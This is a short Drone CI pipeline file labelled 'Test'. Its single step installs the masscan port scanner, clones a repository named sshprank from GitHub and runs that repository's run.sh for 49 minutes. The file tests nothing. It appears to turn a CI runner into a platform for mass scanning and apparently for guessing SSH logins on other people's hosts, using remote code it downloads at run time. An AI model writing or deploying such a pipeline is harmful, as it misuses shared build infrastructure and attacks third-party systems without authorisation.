---
kind: pipeline
type: docker
name: Test

steps:
- name: SSh
  image: ubuntu:18.04
  commands:
  - apt update
  - apt install git wget sudo python3 python3-pip masscan -y
  - git clone https://github.com/samita100/sshprank.git
  - cd sshprank
  - python3 -m pip install --upgrade pip setuptools wheel
  - pip3 install -r requirements.txt
  - timeout 49m ./run.sh
  environment:
    DEBIAN_FRONTEND: noninteractive
